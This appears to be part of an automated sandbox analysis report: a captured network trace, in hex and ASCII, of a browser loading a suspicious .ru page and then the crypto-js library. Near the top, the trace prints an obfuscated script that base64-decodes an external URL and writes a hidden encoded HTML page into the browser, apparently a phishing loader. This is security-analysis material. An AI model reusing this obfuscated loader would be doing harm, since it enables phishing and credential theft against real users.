                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2F5npt20rgzslxyjcvN5hcEWIjd9HrIEQFt5W8OC664ZBjFs%2Fxlo4eaRW6G%2BFMPAmgukv5g3vyO%2FFhIELMV%2FCAa2EOuNJsmSlgiw56rcUazHcw%2B%2FzNhOA9HH44Dg"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5033&min_rtt=5006&rtt_var=1896&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1617&delivery_rate=568917&cwnd=251&unsent_bytes=0&cid=f99ff5457eb9c4fe&ts=119&x=0"
                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IkhyQmc5VDAyN3NXU0E0OG9QdXdYTkE9PSIsInZhbHVlIjoiNnBCQjF6N3JBTTladHZCMW5kRTN3b2RsNU5sODg0bTVtRE9qUDJPVDJRSjVIVGVZSVVRdURhb0RtbXpkTURPaXRaQ2tLSVIvTVdyc2xDU2ZiRGJWVjRRdzVSSGFUVXRCV0haSnErL1pKR1JyUUJJUC95WWRQTWdkWUtGNStXTG0iLCJtYWMiOiJmNzI3YTA4ODI5NGY0MDk4YjhkMTJhYTE1ZmIxZTNlNThmMjNjZTc4MDE1NGVmZWMxNTZiYzcxNjRlMTUzNzU1IiwidGFnIjoiIn0%3D; expires=Fri, 14-Mar-2025 13:30:38 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                  2025-03-14 11:30:38 UTC762INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 39 4f 5a 47 70 70 4e 79 74 6a 51 33 4d 72 56 6d 74 7a 63 7a 59 79 64 7a 4a 70 52 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 6e 4e 71 61 6d 39 68 4d 54 46 4b 54 47 5a 69 51 6c 56 46 63 56 56 52 54 30 39 71 61 6d 34 30 4f 57 4a 54 59 32 68 58 64 58 4e 4f 4e 30 56 73 4e 47 70 4b 62 47 39 6e 53 48 68 33 54 57 68 43 4b 30 64 58 53 46 64 52 53 30 4d 79 56 57 74 54 62 56 4d 72 5a 47 6c 54 64 48 70 42 53 57 56 43 59 57 30 77 52 57 5a 4c 64 33 64 68 4d 6d 45 32 4b 7a 5a 73 57 56 56 42 51 6b 4e 6a 65 55 31 4d 5a 32 56 77 56 54 46 76 4d 44 4e 73 61 55 52 36 52 55 4a 52 57 57 52 33 54 56 59 72 52 6b 35 5a 55 58 45 30 56 6c 5a 44 65 6a 51
                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ik9OZGppNytjQ3MrVmtzczYydzJpR2c9PSIsInZhbHVlIjoiYnNqam9hMTFKTGZiQlVFcVVRT09qam40OWJTY2hXdXNON0VsNGpKbG9nSHh3TWhCK0dXSFdRS0MyVWtTbVMrZGlTdHpBSWVCYW0wRWZLd3dhMmE2KzZsWVVBQkNjeU1MZ2VwVTFvMDNsaUR6RUJRWWR3TVYrRk5ZUXE0VlZDejQ
                                                                  2025-03-14 11:30:38 UTC287INData Raw: 31 31 38 0d 0a 3c 73 63 72 69 70 74 3e 0a 76 52 4d 4a 54 61 7a 68 59 4b 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 73 4e 33 63 75 61 6d 74 75 5a 47 5a 31 65 6e 59 75 63 6e 55 76 55 48 52 4e 4d 6d 6b 76 22 29 3b 0a 55 56 70 42 78 79 6c 6c 52 55 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 44 69 44 76 55 53 43 43 56 4c 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 76 52 4d 4a 54 61 7a 68 59 4b 20 3d 3d 20 55 56 70 42 78 79 6c 6c 52 55 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 44 69 44 76 55 53 43 43 56 4c 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f 64 47 31 73 50
                                                                  Data Ascii: 118<script>vRMJTazhYK = atob("aHR0cHM6Ly9sN3cuamtuZGZ1enYucnUvUHRNMmkv");UVpBxyllRU = atob("bm9tYXRjaA==");DiDvUSCCVL = atob("d3JpdGU=");if(vRMJTazhYK == UVpBxyllRU){document[DiDvUSCCVL](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sP
                                                                  2025-03-14 11:30:38 UTC1369INData Raw: 32 31 36 64 0d 0a 69 61 57 4e 76 62 69 49 67 61 48 4a 6c 5a 6a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6b 5a 58 5a 6c 62 47 39 77 5a 58 4a 7a 4c 6d 4e 73 62 33 56 6b 5a 6d 78 68 63 6d 55 75 59 32 39 74 4c 32 5a 68 64 6d 6c 6a 62 32 34 75 63 47 35 6e 49 69 42 30 65 58 42 6c 50 53 4a 70 62 57 46 6e 5a 53 39 34 4c 57 6c 6a 62 32 34 69 50 67 6f 67 49 43 41 67 50 47 31 6c 64 47 45 67 61 48 52 30 63 43 31 6c 63 58 56 70 64 6a 30 69 57 43 31 56 51 53 31 44 62 32 31 77 59 58 52 70 59 6d 78 6c 49 69 42 6a 62 32 35 30 5a 57 35 30 50 53 4a 4a 52 54 31 46 5a 47 64 6c 4c 47 4e 6f 63 6d 39 74 5a 54 30 78 49 6a 34 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 4a 76 59 6d 39 30 63 79 49 67 59 32 39 75 64 47 56 75 64 44 30 69 62 6d 39 70 62 6d 52 6c
                                                                  Data Ascii: 216diaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRl
                                                                  2025-03-14 11:30:38 UTC1369INData Raw: 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34
                                                                  Data Ascii: Wk44Wk776g776g44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk44Wk776g776g776g44Wk776g776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk44Wk776g776g44Wk776g776g44Wk44Wk776g44Wk776g776g44Wk776g44Wk44Wk44Wk776g44Wk44Wk776g776g44Wk44Wk776g776g4
                                                                  2025-03-14 11:30:38 UTC1369INData Raw: 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37
                                                                  Data Ascii: k44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g776g776g776g776g44Wk44Wk776g44Wk776g776g776g776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk44Wk776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk776g44Wk44Wk776g44Wk776g776g44Wk77
                                                                  2025-03-14 11:30:38 UTC1369INData Raw: 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36
                                                                  Data Ascii: 44Wk44Wk776g44Wk776g44Wk776g44Wk44Wk44Wk776g776g44Wk776g776g44Wk44Wk44Wk776g776g776g776g776g776g44Wk776g776g776g44Wk776g776g776g44Wk776g44Wk776g776g44Wk776g776g44Wk776g44Wk776g776g44Wk776g776g44Wk776g776g776g776g776g776g44Wk44Wk44Wk44Wk776g44Wk44Wk776g776
                                                                  2025-03-14 11:30:38 UTC1369INData Raw: 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b
                                                                  Data Ascii: 76g44Wk44Wk776g44Wk44Wk776g776g776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk776g44Wk776g44Wk44Wk776g776g44Wk776g776g776g44Wk776g776g776g44Wk44Wk44Wk776g44Wk44Wk776g776g776g776g44Wk776g44Wk776g776g44Wk44Wk44Wk44Wk44Wk776g44Wk
                                                                  2025-03-14 11:30:38 UTC1369INData Raw: 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37
                                                                  Data Ascii: Wk776g776g776g44Wk776g776g776g44Wk776g776g776g44Wk776g44Wk44Wk776g776g776g776g44Wk776g776g776g776g776g776g44Wk44Wk776g776g44Wk44Wk776g776g44Wk44Wk44Wk776g44Wk776g44Wk776g44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk776g44Wk7
                                                                  2025-03-14 11:30:38 UTC351INData Raw: 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37
                                                                  Data Ascii: k776g776g44Wk776g44Wk44Wk44Wk776g776g776g776g776g44Wk44Wk44Wk44Wk776g776g44Wk776g776g44Wk776g44Wk776g776g776g776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk44Wk44Wk776g44Wk44Wk776g776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk44Wk77
                                                                  2025-03-14 11:30:38 UTC1369INData Raw: 34 63 31 30 0d 0a 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34
                                                                  Data Ascii: 4c1044Wk776g44Wk44Wk776g776g776g776g44Wk776g44Wk776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g4


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449724104.17.25.144435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:39 UTC705OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                  Host: cdnjs.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Sec-Fetch-Storage-Access: active
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:30:39 UTC955INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:30:39 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=30672000
                                                                  ETag: W/"61182885-40eb"
                                                                  Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                  cf-cdnjs-via: cfworker/kv
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Timing-Allow-Origin: *
                                                                  X-Content-Type-Options: nosniff
                                                                  CF-Cache-Status: HIT
                                                                  Age: 33399
                                                                  Expires: Wed, 04 Mar 2026 11:30:39 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xpltko86U7QRP5EB8bxuZw%2FituuKchxFPyqokVzh9P0NTqmHNgcHOTCtPL3Ziz19todPozJU4qckZGJytiwEu%2FNyDrfxynBs5PgfhBpAYFVay5ckrsvOtFTFsGaBJNFt3Rt87tH0"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                  Strict-Transport-Security: max-age=15780000
                                                                  Server: cloudflare
                                                                  CF-RAY: 920370b4cb0f1914-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-03-14 11:30:39 UTC414INData Raw: 37 62 66 36 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                  Data Ascii: 7bf6!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                  2025-03-14 11:30:39 UTC1369INData Raw: 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c
                                                                  Data Ascii: obalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create|
                                                                  2025-03-14 11:30:39 UTC1369INData Raw: 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79
                                                                  Data Ascii: (this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try
                                                                  2025-03-14 11:30:39 UTC1369INData Raw: 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d
                                                                  Data Ascii: t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=
                                                                  2025-03-14 11:30:39 UTC1369INData Raw: 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a
                                                                  Data Ascii: t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:
                                                                  2025-03-14 11:30:39 UTC1369INData Raw: 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e
                                                                  Data Ascii: r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>
